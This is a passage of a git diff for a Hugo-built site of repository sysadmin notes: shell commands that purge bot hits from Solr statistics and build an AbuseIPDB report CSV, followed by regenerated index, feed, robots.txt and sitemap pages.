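Purging 1264 hits from 54.175.8.110 in statistics
Purging 6117 hits from 54.82.125.225 in statistics
Purging 486 hits from 54.90.79.112 in statistics
EOF

# Sum the hit counts (field 2) — matches the reported total of 67229
awk '/^Purging/ { sum += $2 } END { print sum }' /tmp/purge.log
```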
+- Then I created a CSV with these IPs and reported them to AbuseIPDB.com:
+
+$ cat /tmp/ips.csv
+IP,Categories,ReportDate,Comment
+100.24.63.172,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+174.129.118.171,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+18.232.101.158,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.238.116.153,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.239.81.247,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.227.10.4,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+34.236.36.176,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.153.131.101,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+35.172.193.232,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+3.85.92.145,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+44.200.190.111,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+52.73.204.196,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.174.240.122,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.175.8.110,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.82.125.225,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+54.90.79.112,4,2022-04-27T04:00:37-10:00,"Excessive automated HTTP requests"
+
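+- A CSV in that shape can be generated from the IP list rather than typed by hand; a minimal sketch with a two-IP sample list and the report timestamp hardcoded for the example:

```shell
# Sample IP list (the real one was /tmp/ips.txt)
printf '100.24.63.172\n174.129.118.171\n' > /tmp/ips-sample.txt

# Emit one AbuseIPDB bulk-report row per IP, using the same Categories
# value (4) and comment as the reports above
{
    echo 'IP,Categories,ReportDate,Comment'
    while read -r ip; do
        echo "${ip},4,2022-04-27T04:00:37-10:00,\"Excessive automated HTTP requests\""
    done < /tmp/ips-sample.txt
} > /tmp/ips-sample.csv

cat /tmp/ips-sample.csv
```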
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/docs/2022/04/cgspace-load.png b/docs/2022/04/cgspace-load.png
new file mode 100644
index 000000000..02851e3d6
Binary files /dev/null and b/docs/2022/04/cgspace-load.png differ
diff --git a/docs/2022/04/jmx_dspace_sessions-day2.png b/docs/2022/04/jmx_dspace_sessions-day2.png
new file mode 100644
index 000000000..8f77487a1
Binary files /dev/null and b/docs/2022/04/jmx_dspace_sessions-day2.png differ
diff --git a/docs/404.html b/docs/404.html
index 5ab1043b6..5c30c95f4 100644
--- a/docs/404.html
+++ b/docs/404.html
@@ -17,7 +17,7 @@
-
+
@@ -95,9 +95,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/index.html b/docs/categories/index.html
index 090338fa5..f04283e90 100644
--- a/docs/categories/index.html
+++ b/docs/categories/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -84,7 +84,7 @@
Notes
-
+
Read more →
@@ -108,9 +108,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/index.xml b/docs/categories/index.xml
index 367911ffb..a62cb3e0b 100644
--- a/docs/categories/index.xml
+++ b/docs/categories/index.xml
@@ -6,11 +6,11 @@
Recent content in Categories on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
-
Notes
https://alanorth.github.io/cgspace-notes/categories/notes/
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
https://alanorth.github.io/cgspace-notes/categories/notes/
diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html
index 70b6de763..317f29fc9 100644
--- a/docs/categories/notes/index.html
+++ b/docs/categories/notes/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -81,6 +81,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -107,24 +125,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -365,9 +365,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/index.xml b/docs/categories/notes/index.xml
index 4d960654b..3fc75bf7d 100644
--- a/docs/categories/notes/index.xml
+++ b/docs/categories/notes/index.xml
@@ -6,7 +6,16 @@
Recent content in Notes on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html
index 60f5b3b20..a11251ad6 100644
--- a/docs/categories/notes/page/2/index.html
+++ b/docs/categories/notes/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -381,9 +381,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html
index 1612f051a..3c05f6f29 100644
--- a/docs/categories/notes/page/3/index.html
+++ b/docs/categories/notes/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -404,9 +404,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html
index 7ad9f5b1e..cd98ee051 100644
--- a/docs/categories/notes/page/4/index.html
+++ b/docs/categories/notes/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -429,9 +429,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
index de12161c7..fa909e40e 100644
--- a/docs/categories/notes/page/5/index.html
+++ b/docs/categories/notes/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -408,9 +408,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html
index 0eb3e35a2..4c991788d 100644
--- a/docs/categories/notes/page/6/index.html
+++ b/docs/categories/notes/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -358,9 +358,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html
index ed69b1eac..470540e82 100644
--- a/docs/cgiar-library-migration/index.html
+++ b/docs/cgiar-library-migration/index.html
@@ -18,7 +18,7 @@
-
+
@@ -282,9 +282,9 @@ dspace=# select setval('handle_seq',86873);
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html
index 609a9532d..c8c005260 100644
--- a/docs/cgspace-cgcorev2-migration/index.html
+++ b/docs/cgspace-cgcorev2-migration/index.html
@@ -18,7 +18,7 @@
-
+
@@ -467,9 +467,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html
index 217c9147f..67f0d693b 100644
--- a/docs/cgspace-dspace6-upgrade/index.html
+++ b/docs/cgspace-dspace6-upgrade/index.html
@@ -18,7 +18,7 @@
-
+
@@ -471,9 +471,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/index.html b/docs/index.html
index b08412a49..785076329 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -96,6 +96,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -122,24 +140,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -380,9 +380,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/index.xml b/docs/index.xml
index 2b03396b1..6de35547f 100644
--- a/docs/index.xml
+++ b/docs/index.xml
@@ -6,7 +6,16 @@
Recent content on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/page/2/index.html b/docs/page/2/index.html
index 78eef02da..67bee93e3 100644
--- a/docs/page/2/index.html
+++ b/docs/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -396,9 +396,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/3/index.html b/docs/page/3/index.html
index 992c7afe9..0db5ab138 100644
--- a/docs/page/3/index.html
+++ b/docs/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -419,9 +419,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/4/index.html b/docs/page/4/index.html
index c74853c2d..3e8090fec 100644
--- a/docs/page/4/index.html
+++ b/docs/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/5/index.html b/docs/page/5/index.html
index cd96e221f..dad4c62f6 100644
--- a/docs/page/5/index.html
+++ b/docs/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -423,9 +423,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/6/index.html b/docs/page/6/index.html
index e644c9da7..c7b794b22 100644
--- a/docs/page/6/index.html
+++ b/docs/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -437,9 +437,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/7/index.html b/docs/page/7/index.html
index 7840c814a..72fbe8d92 100644
--- a/docs/page/7/index.html
+++ b/docs/page/7/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -388,9 +388,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/8/index.html b/docs/page/8/index.html
index ef638dd82..9a11ff26a 100644
--- a/docs/page/8/index.html
+++ b/docs/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -384,9 +384,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/page/9/index.html b/docs/page/9/index.html
index e2c4e739d..4b45b920e 100644
--- a/docs/page/9/index.html
+++ b/docs/page/9/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -145,9 +145,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/index.html b/docs/posts/index.html
index 8001303e8..1fdc5e0fa 100644
--- a/docs/posts/index.html
+++ b/docs/posts/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -96,6 +96,24 @@
+
+
+ April, 2022
+
+
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+ Read more →
+
+
+
+
+
+
+
March, 2022
@@ -122,24 +140,6 @@
-
-
- April, 2022
-
-
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
- Read more →
-
-
-
-
-
-
-
February, 2022
@@ -380,9 +380,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/index.xml b/docs/posts/index.xml
index 22bcc06c6..a4b96d859 100644
--- a/docs/posts/index.xml
+++ b/docs/posts/index.xml
@@ -6,7 +6,16 @@
Recent content in Posts on CGSpace Notes
Hugo -- gohugo.io
en-us
- Tue, 01 Mar 2022 16:46:54 +0300
+ Fri, 01 Apr 2022 10:53:39 +0300
+ -
+
April, 2022
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ Fri, 01 Apr 2022 10:53:39 +0300
+
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
+
+
-
March, 2022
https://alanorth.github.io/cgspace-notes/2022-03/
@@ -24,15 +33,6 @@
</span></span></code></pre></div>
- -
-
April, 2022
- https://alanorth.github.io/cgspace-notes/2022-03/
- Tue, 01 Mar 2022 10:53:39 +0300
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54.
-
-
-
February, 2022
https://alanorth.github.io/cgspace-notes/2022-02/
diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html
index 01281faa3..18a53bd74 100644
--- a/docs/posts/page/2/index.html
+++ b/docs/posts/page/2/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -396,9 +396,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html
index 2549bfbb4..42ca7e23a 100644
--- a/docs/posts/page/3/index.html
+++ b/docs/posts/page/3/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -419,9 +419,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html
index 59293c88e..d54e057c1 100644
--- a/docs/posts/page/4/index.html
+++ b/docs/posts/page/4/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -444,9 +444,9 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
index 857278e24..7898d0ce0 100644
--- a/docs/posts/page/5/index.html
+++ b/docs/posts/page/5/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -423,9 +423,9 @@ sys 2m7.289s
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html
index 1294c4e9d..86b9f4c27 100644
--- a/docs/posts/page/6/index.html
+++ b/docs/posts/page/6/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -437,9 +437,9 @@ COPY 54701
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html
index fee3989f1..ab75a4ae1 100644
--- a/docs/posts/page/7/index.html
+++ b/docs/posts/page/7/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -388,9 +388,9 @@ DELETE 1
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html
index ccf6eb62b..3d6feb794 100644
--- a/docs/posts/page/8/index.html
+++ b/docs/posts/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -384,9 +384,9 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/posts/page/9/index.html b/docs/posts/page/9/index.html
index 35256770d..6f0deae84 100644
--- a/docs/posts/page/9/index.html
+++ b/docs/posts/page/9/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -31,7 +31,7 @@
"@type": "Person",
"name": "Alan Orth"
},
- "dateModified": "2022-03-01T16:46:54+03:00",
+ "dateModified": "2022-04-01T10:53:39+03:00",
"keywords": "notes, migration, notes",
"description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
}
@@ -145,9 +145,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/robots.txt b/docs/robots.txt
index a008419cc..e6b39c479 100644
--- a/docs/robots.txt
+++ b/docs/robots.txt
@@ -1,9 +1,9 @@
User-agent: *
+Disallow: /cgspace-notes/2022-04/
Disallow: /cgspace-notes/categories/
Disallow: /cgspace-notes/
-Disallow: /cgspace-notes/2022-03/
Disallow: /cgspace-notes/categories/notes/
Disallow: /cgspace-notes/posts/
Disallow: /cgspace-notes/2022-03/
diff --git a/docs/sitemap.xml b/docs/sitemap.xml
index 90a684459..b8b8f7795 100644
--- a/docs/sitemap.xml
+++ b/docs/sitemap.xml
@@ -2,23 +2,23 @@
+ https://alanorth.github.io/cgspace-notes/2022-04/
+ 2022-04-27T08:44:10+03:00
+
https://alanorth.github.io/cgspace-notes/categories/
- 2022-04-24T21:06:28+03:00
+ 2022-04-27T08:44:10+03:00
https://alanorth.github.io/cgspace-notes/
- 2022-04-24T21:06:28+03:00
+ 2022-04-27T08:44:10+03:00
+
+ https://alanorth.github.io/cgspace-notes/categories/notes/
+ 2022-04-27T08:44:10+03:00
+
+ https://alanorth.github.io/cgspace-notes/posts/
+ 2022-04-27T08:44:10+03:00
https://alanorth.github.io/cgspace-notes/2022-03/
2022-04-04T19:15:58+03:00
-
- https://alanorth.github.io/cgspace-notes/categories/notes/
- 2022-04-24T21:06:28+03:00
-
- https://alanorth.github.io/cgspace-notes/posts/
- 2022-04-24T21:06:28+03:00
-
- https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-24T21:06:28+03:00
https://alanorth.github.io/cgspace-notes/2022-02/
2022-03-01T17:17:27+03:00
diff --git a/docs/tags/index.html b/docs/tags/index.html
index 0702410a0..c91f2e7fc 100644
--- a/docs/tags/index.html
+++ b/docs/tags/index.html
@@ -17,7 +17,7 @@
-
+
@@ -122,9 +122,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html
index 8b2dc3922..52cb6b60f 100644
--- a/docs/tags/migration/index.html
+++ b/docs/tags/migration/index.html
@@ -17,7 +17,7 @@
-
+
@@ -155,9 +155,9 @@
-- March, 2022
+- April, 2022
-- April, 2022
+- March, 2022
- February, 2022
diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html
